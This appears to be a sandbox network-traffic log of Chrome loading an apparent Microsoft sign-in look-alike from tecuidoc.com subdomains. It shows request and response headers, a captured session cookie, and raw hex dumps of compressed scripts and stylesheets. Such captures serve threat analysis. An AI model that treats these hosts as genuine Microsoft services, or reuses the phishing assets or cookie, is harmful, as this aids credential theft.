                                              39192.168.2.649761198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:15 UTC707OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                              Sec-WebSocket-Key: MU9yAcvJs3G599TU8wdU4g==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:57:18 UTC737INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:18 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: 9fdfc594-68fa-430e-ab3d-e2c2f7041c01
                                              x-ms-ests-server: 2.1.17846.6 - FRC ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.649766198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:19 UTC627OUTGET /converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:22 UTC726INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:22 GMT
                                              Content-Type: text/css
                                              Content-Length: 17755
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465507
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C00E36AF05
                                              last-modified: Sun, 21 Apr 2024 05:01:07 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: ef0f9719-901e-009a-11ae-93b344000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:22 UTC6468INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 73 db 46 d2 f0 77 ff 0a ac 5c ae 58 59 12 e1 2d 4a aa a4 d6 87 12 eb 59 1f 2a 4b d9 ec 56 de 94 0b 22 21 11 6b 10 60 01 a0 65 85 0f ff fb db 73 5f 3d 00 28 c9 89 9f aa 44 b1 44 ce f4 f4 5c 3d 3d 3d 33 7d 7c f7 ed df 82 17 f9 ea b6 48 ae 17 55 f0 f4 c5 7e f0 26 99 15 79 99 5f 55 90 5e ac f2 22 aa 92 3c 0b 83 67 69 1a 50 a0 32 28 e2 32 2e 3e c5 f3 30 f8 f6 bb ef be fd db a3 6e fb ff 82 f3 8b 67 ef 2f 82 77 3f 06 17 af 4e df bf 0c ce e0 db 7f 82 b7 ef 2e 4e 5f 9c 04 ad b1 3c 7a 74 b1 48 ca e0 2a 49 e3 00 fe 5e 46 65 3c 0f f2 2c c8 8b 20 c9 66 bc d5 71 19 2c e1 77 91 44 69 70 55 e4 cb a0 5a c4 c1 aa c8 ff 1b cf a0 0f 69 52 56 50 e8 32 4e f3 9b e0 29 a0 2b e6 c1 59 54 54 b7 c1 e9 d9 7e 18 5c 00 6c 0e dd 4d 32 28 3d 93 e3
                                              Data Ascii: }isFw\XY-JY*KV"!k`es_=(DD\===3}|HU~&y_U^"<giP2(2.>0ng/w?N.N_<ztH*I^Fe<, fq,wDipUZiRVP2N)+YTT~\lM2(=
                                              2024-04-26 14:57:22 UTC11287INData Raw: b4 44 a6 dc f2 03 12 2b 34 4f a2 34 bf 46 68 58 77 81 c4 40 b9 08 8d c0 7a 2e c1 6a b4 4d 9d c6 fb 8e 87 f5 23 86 a9 a7 38 28 c3 2b 38 ea 6e 84 39 6b 4f 1c ed a3 74 b5 88 9e f2 e4 ef 7b fb 4e b1 24 93 85 c2 31 5e 6a ac 8a 89 87 4f cd 5f cf 84 1d 91 09 85 31 18 f6 0a 21 7d 16 20 c7 69 d9 08 12 3f 01 e1 08 2c f7 2a cf 2b cd d7 96 91 d8 78 dc c1 a0 b5 13 0f cb 66 c4 46 0e b1 cb 38 2a d7 45 ec b9 8b ed 1e c2 7f d2 17 d8 58 33 14 a1 9f e5 72 60 f8 90 27 bc f1 88 3d e1 19 d4 c8 5d 58 f4 7a 6a e8 ca a5 f0 c3 41 53 6b bc b0 30 f8 54 60 39 64 f0 2c 39 30 eb e1 33 31 ee 7d 5a 50 57 0d 2a 54 8f 74 81 4e 3f c1 e8 c7 e4 10 da 1d f7 9e ec b3 48 3f b5 00 79 7d 7e 6d a6 a3 c4 2d ad 0e 8d 1e c8 c5 28 a4 cb 89 1c ab 60 65 08 14 a6 ec c7 91 a8 93 09 1c 3f 66 4f 47 d3 27 fb
                                              Data Ascii: D+4O4FhXw@z.jM#8(+8n9kOt{N$1^jO_1!} i?,*+xfF8*EX3r`'=]XzjASk0T`9d,9031}ZPW*TtN?H?y}~m-(`e?fOG'


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.649765198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:19 UTC607OUTGET /jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:22 UTC739INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:22 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 5564
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465352
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C01E449421
                                              last-modified: Sun, 21 Apr 2024 05:01:34 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: cbd11eef-b01e-0030-59ae-937b37000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:22 UTC5564INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 3c 6b 8f db 38 92 df fd 2b da c2 c2 90 10 c5 70 67 80 fb 60 b5 62 64 33 b3 97 e0 66 a6 f7 36 99 bd 3b 18 46 a0 b6 e9 b6 26 32 e9 a5 e8 ee 34 da fa ef 57 c5 87 44 52 92 fb e5 bb 64 06 88 5b 14 45 56 15 eb cd 22 d7 7b ba 14 39 a3 67 5f b2 d5 ea 97 1b 42 c5 af 79 29 08 25 3c 24 b1 88 69 74 4f 46 23 32 f6 5f ce da 4d 21 f6 9e 62 ef b3 9c 96 22 a3 4b c2 d6 67 1f 3e ff f6 eb 2f 05 d9 42 47 39 8e 10 d9 72 23 bf f3 1e c3 80 d1 e0 15 8e 51 ad 6b 98 ae 89 b8 e4 9f 88 f8 3b 67 bb f2 92 ea 81 4a 05 5a cc a3 fb 7c 0d df 5d fd 49 96 22 48 53 71 b7 c3 29 45 74 ff 65 cd f8 2f 30 f2 7f 90 3b 00 cb 8c 17 02 36 f0 22 bc c9 f8 59 99 4e e2 3c 25 63 02 43 96 49 79 91 8f 0b 42 af c5 26 29 5f bd 8a ee b1 07 4b f3 79 b9 48 f8 8c cd f9 62 4e 17 a9
                                              Data Ascii: <k8+pg`bd3f6;F&24WDRd[EV"{9g_By)%<$itOF#2_M!b"Kg>/BG9r#Qk;gJZ|]I"HSq)Ete/0;6"YN<%cCIyB&)_KyHbN


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.649764198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:19 UTC611OUTGET /knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:23 UTC740INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:22 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 28601
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465615
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C01E305F7A
                                              last-modified: Sun, 21 Apr 2024 05:01:34 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 50df464f-f01e-009c-3fad-934948000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:23 UTC15644INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 79 57 db 48 f6 37 fe 7f ce c9 7b 90 f5 e4 10 a9 29 04 74 f7 cc f4 c8 28 fe 11 20 09 dd 04 32 40 ba a7 87 30 39 da bc c4 f2 82 65 b3 04 fb bd ff ee e7 56 95 54 92 45 ba e7 bb 3c e7 c9 f4 60 a9 54 fb 72 eb ee 77 fb bb d6 d6 9f ff 67 5d 5c ee 9f 5f 5a 67 6f ac cb 77 c7 e7 87 d6 07 7a fb dd 3a 3d bb 3c 3e 38 b2 fe 74 2d cf 9f 3d 7f 76 d9 1f e4 56 77 90 a5 16 fd 46 61 9e 26 d6 64 6c 4d 66 d6 60 1c 4f 66 d3 c9 2c 9c a7 b9 35 a2 bf b3 41 98 59 dd d9 64 64 cd fb a9 35 9d 4d be a4 f1 3c b7 b2 41 3e a7 42 51 9a 4d ee 2c 87 aa 9b 25 d6 87 70 36 7f b0 8e 3f b8 9e 75 49 79 27 b3 41 6f 30 a6 d2 f1 64 fa 40 cf fd b9 35 9e cc 07 71 6a 85 e3 84 6b cb e8 65 9c a7 d6 62 9c a4 33 eb ae 3f 88 fb d6 fb 41 3c 9b e4 93 ee dc 9a a5 71 3a b8 a5
                                              Data Ascii: yWH7{)t( 2@09eVTE<`Trwg]\_Zgowz:=<>8t-=vVwFa&dlMf`Of,5AYdd5M<A>BQM,%p6?uIy'Ao0d@5qjkeb3?A<q:
                                              2024-04-26 14:57:23 UTC12957INData Raw: 74 62 b9 cc 34 b7 4e 85 f0 93 43 ad 53 37 34 8f 3d 5e a5 a9 a0 d3 ba 5c f6 60 75 d6 8a 18 a2 a1 5c 42 68 f1 e0 66 91 e2 58 b1 22 83 53 09 5e 51 fa 31 65 50 9a 56 14 40 d0 2a b6 8a 0d a5 9d a1 2d 52 05 6f 2b b8 25 6b d1 f6 bd 5f 8b 15 68 a9 8b c3 98 aa e0 f9 b3 e6 63 1b 19 51 9c 15 4a a9 35 96 a9 86 3c ff 93 a7 5d 85 97 c2 b1 59 8f a6 dd f9 43 30 80 87 e3 50 bb 3e 60 2f 52 5a f5 54 6a 5a 16 19 b4 e9 37 75 8d 07 86 ad bc 96 18 c4 c2 a8 91 76 af f4 b1 4a 64 24 ab 0e fc d9 31 c5 00 3f 74 81 a2 4c d2 00 59 6c fd 0d bc 10 80 16 fd ce 1e e9 f5 0b f3 fa 65 f3 2a e9 89 f6 cb 0e 2a 1d 97 c6 8d 62 2c 54 31 aa db 06 ec 40 2a b5 3e 7f c6 56 76 ca 41 b2 63 42 e5 61 59 79 df 64 21 a9 55 53 7b 1e 15 f5 2b 12 70 a9 83 38 42 6d 57 fd 6b a5 56 a8 35 67 87 1a 6d 30 1c b4 05
                                              Data Ascii: tb4NCS74=^\`u\BhfX"S^Q1ePV@*-Ro+%k_hcQJ5<]YC0P>`/RZTjZ7uvJd$1?tLYle**b,T1@*>VvAcBaYyd!US{+p8BmWkV5gm0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.649763198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:19 UTC634OUTGET /lwsignupstringscountrybirthdate_en-us_gdxUIqa3ijrOefuBnwhTKg2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:22 UTC739INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:22 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 7221
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465391
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C0213530C8
                                              last-modified: Sun, 21 Apr 2024 05:01:39 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 2a34eede-601e-004d-4dae-93562c000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:22 UTC7221INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 5c db 72 e3 48 72 7d f7 57 60 69 47 a8 c7 d1 a3 e6 fd d2 db d2 5a a2 24 8a 2d 92 e2 88 94 fa b2 bb 31 51 04 4a 24 46 20 8a 83 8b 38 ec 8e 89 f0 8b 3f c2 cf 7e 70 ec 83 df fc 07 fd 27 fe 12 67 16 00 22 13 12 a0 c1 c4 c6 be 74 53 40 56 55 d6 c9 db c9 02 c8 3f dc 87 ae 19 d8 ca 7d f5 dd 57 4f 2e 6d 3f 90 de 44 ac a5 bf 11 a6 7c 55 f9 97 be 72 ef ed 65 e5 bb d7 f1 a7 43 7f 25 3c 69 cd 02 cf 76 97 fe d1 d7 8a f4 3c e5 f9 95 b7 5f 2b 9e fc 39 b4 e1 5e e5 6d 65 be b2 7d c3 76 ef 95 b7 16 38 b9 01 7f 26 b7 0f 2b af 2b 72 2d 6c e7 26 95 3f 71 0d 7d c9 10 96 e5 49 df a7 f2 20 be 59 29 57 52 71 43 5f 31 dc 70 bd 90 5e 56 58 f8 fe 56 79 16 97 8f 2f 66 64 6d f7 51 38 b6 75 8e 6b 5f 68 65 41 fa dc 05 0c 8c 60 25 b3 3a b9 fa 62 b4 29 c3
                                              Data Ascii: \rHr}W`iGZ$-1QJ$F 8?~p'g"tS@VU?}WO.m?D|UreC%<iv<_+9^me}v8&++r-l&?q}I Y)WRqC_1p^VXVy/fdmQ8uk_heA`%:b)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.649767198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:19 UTC621OUTGET /lightweightsignuppackage_9itStK--DdHYjkMJSN7X3A2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:23 UTC740INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:22 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 53541
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 329312
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC5F4987C85CD0
                                              last-modified: Thu, 18 Apr 2024 01:47:39 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 8e855890-401e-001b-44eb-94cf13000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:23 UTC13694INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec 7d 79 7f db b6 b2 e8 ff fe 14 32 eb a3 92 15 a4 48 f2 92 44 0a ad eb 25 69 dc 6c 6e 9c 34 6d 5d 35 8f 16 29 89 35 45 aa 24 e5 a5 96 ee 67 7f 33 03 80 04 37 d9 c9 69 ef b9 ef f7 7b 3d 27 16 09 80 58 06 83 d9 30 18 8c 17 fe 28 76 03 bf f6 dc 1f 85 b7 f3 58 77 58 cc 7c 66 19 77 57 56 58 0b cc f3 61 3f ba 76 e3 d1 54 f7 5b 71 f0 3a b8 76 c2 23 2b 72 74 c3 b8 1b c1 af 36 9a 4e a2 3f 23 4b eb b9 63 dd 5f 78 9e 69 3a cb 25 7f 88 8d bb d0 89 17 a1 5f c3 f7 55 60 9e 5a a3 4b 6b e2 9c 1d 1c 5b b1 85 0d 19 fd 8b d0 b1 2e fb b2 a6 f9 b5 5d 56 91 55 51 d1 5b e7 fa c0 b7 df 79 f6 e9 b5 0d d5 59 99 ea 72 75 55 54 01 5f be f3 bd 5b dd c9 7e eb fa 0f f9 d6 f5 cb be 0d 83 60 ac 7e 5d af af 07 c7 eb 60 e2 fa 27 7e 4c 40 c1 ac 4d d3 19 38 bd
                                              Data Ascii: }y2HD%iln4m]5)5E$g37i{='X0(vXwX|fwWVXa?vT[q:v#+rt6N?#Kc_xi:%_U`ZKk[.]VUQ[yYruUT_[~`~]`'~L@M8
                                              2024-04-26 14:57:23 UTC16384INData Raw: 87 ee 11 59 69 e0 94 77 18 05 d2 af d7 7f 90 21 4c f0 28 3f a8 bd 26 37 0d eb 90 df 31 94 61 bc 83 51 60 c4 1e 24 2e e4 bc c5 ef 0e 23 39 50 fa 71 e9 2f 71 1f 5a 70 24 e9 12 42 44 5a fb 28 8d 91 74 5b 41 ca 26 80 95 86 4e 93 5c e4 71 4e a1 df 51 ac 4c 2e f2 1b 72 ca 48 a6 1f ef 97 10 75 a8 1f a2 1b 88 44 88 d4 7d 7b 4b ff 83 71 91 2f e3 7b 9c 5e 7c 53 90 b0 84 e8 8f 2e e7 18 90 48 d1 19 a5 62 9b a4 81 ec 6c 95 69 90 aa a3 ad 72 1a c4 69 e1 69 a4 7e 15 af e5 ae dd 22 81 a0 8a e3 f0 5b 89 26 43 4c 95 13 03 9f f7 8e a3 39 17 32 de 01 de c6 89 ef 45 81 7c 65 ea d9 12 ad d0 41 16 d5 2f e3 85 da 5f 79 1a 83 62 25 59 14 1c 9f 8f 3f 10 43 a1 d3 e5 1c 4c 11 20 72 38 14 1f 80 56 68 46 78 65 f6 08 1d 2b 61 5d eb a9 a7 3b fa 69 5e 48 b2 83 ef c8 00 47 64 10 af 02 cc
                                              Data Ascii: Yiw!L(?&71aQ`$.#9Pq/qZp$BDZ(t[A&N\qNQL.rHuD}{Kq/{^|S.Hblirii~"[&CL92E|eA/_yb%Y?CL r8VhFxe+a];i^HGd
                                              2024-04-26 14:57:23 UTC16384INData Raw: 94 f3 47 04 dd a5 fa 3d af 77 e2 6c ed b5 5a 5b c7 f0 ff 01 26 fd 3e e0 cb 73 85 23 5a 8e 03 80 de 04 f0 6c 8f 1d e6 cf 70 28 e5 d9 31 7b 9f 3f a3 fe 95 87 07 3d ff c6 06 0a 05 7f df 9a 56 8c f6 8b 32 19 e4 cf cc ce 1d 1f c9 d7 1b 6d 8e 00 f1 76 db f0 c8 71 f8 84 70 24 fc 00 92 6c 32 0b fc d4 b6 fe 0b 68 16 a5 07 97 e9 b1 61 aa 1f 9c 0f 17 3b 97 ed a5 17 24 de 67 98 12 de fc 94 2b ff 60 55 1b 80 a4 ca 00 40 cf 78 57 f0 3e d0 1b d0 55 f5 7d 81 6c ee 06 f7 ee 63 72 65 9c 0e 78 5c 31 4d f6 c1 62 71 d2 5e 2c 0e e0 eb d5 62 71 d8 6e b7 3f 9f 4b 38 19 96 be 75 f2 d5 bb d8 be 54 45 0e d8 44 fa 33 81 fb ed 0c 52 4b 5d 31 05 0a 7d 21 ed 63 0e c4 31 07 e2 bd 80 01 2b b1 e3 0c 04 c2 33 1c 85 f4 a1 ca 18 2a c6 28 63 e8 88 64 ef f1 31 f6 30 73 35 1f 03 da 9e 8b 15 65
                                              Data Ascii: G=wlZ[&>s#Zlp(1{?=V2mvqp$l2ha;$g+`U@xW>U}lcrex\1Mbq^,bqn?K8uTED3RK]1}!c1+3*(cd10s5e
                                              2024-04-26 14:57:23 UTC7079INData Raw: 4d 37 0f 9f ad 24 48 91 ff 86 8f a5 24 44 3b 04 05 b4 8d f0 02 22 a2 e8 c2 d9 2f 07 2f 1e b0 7f 21 f4 09 57 dc 12 c3 2c 12 d7 a7 48 67 05 83 44 4a 61 53 b8 aa 62 1d 92 4d e1 d1 cd 4c c8 a3 c0 f0 9a 9a a9 15 44 9b d3 2a 8b 87 71 a5 c5 83 68 89 c5 bb 09 da 29 4d 29 8c 32 6f 66 1a 36 36 d5 a4 5e a6 9d 79 98 b8 37 de d5 50 6a f6 f7 a3 eb d8 25 d9 1f c3 40 81 18 7d ee 8e 69 42 4d 0f 9c 66 ed 29 24 b2 89 4b de 61 f4 df 33 72 c9 6b 64 14 56 1b b5 b9 f3 8a 6f 50 e7 89 eb 0b 6e 04 ec 4b ef b1 2d 38 e8 b6 6e 39 e6 24 86 56 09 6f 85 d6 c3 cc 6f c3 a6 90 76 87 cc 97 46 8b 20 a2 8e 6a e3 c2 0d 65 00 b0 72 64 37 46 d9 d5 8a 81 dd f0 ed 5f 3c a3 6c 57 69 3c 25 f2 2f ae ab 6f 11 37 3e 08 a6 94 b9 1f f5 67 a4 85 58 02 7d 28 5f df 62 80 39 5d eb ce 22 93 99 95 52 4f 5a 59
                                              Data Ascii: M7$H$D;"//!W,HgDJaSbMLD*qh)M)2of66^y7Pj%@}iBMf)$Ka3rkdVoPnK-8n9$VoovF jerd7F_<lWi<%/o7>gX}(_b9]"ROZY


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.649768198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:20 UTC707OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                              Sec-WebSocket-Key: MirpUHeMHjg0iEGeSAnsUQ==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:57:23 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: 7e2afcc5-d2f0-4ddb-9831-e2e534935d01
                                              x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.649769198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:23 UTC760OUTGET /images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
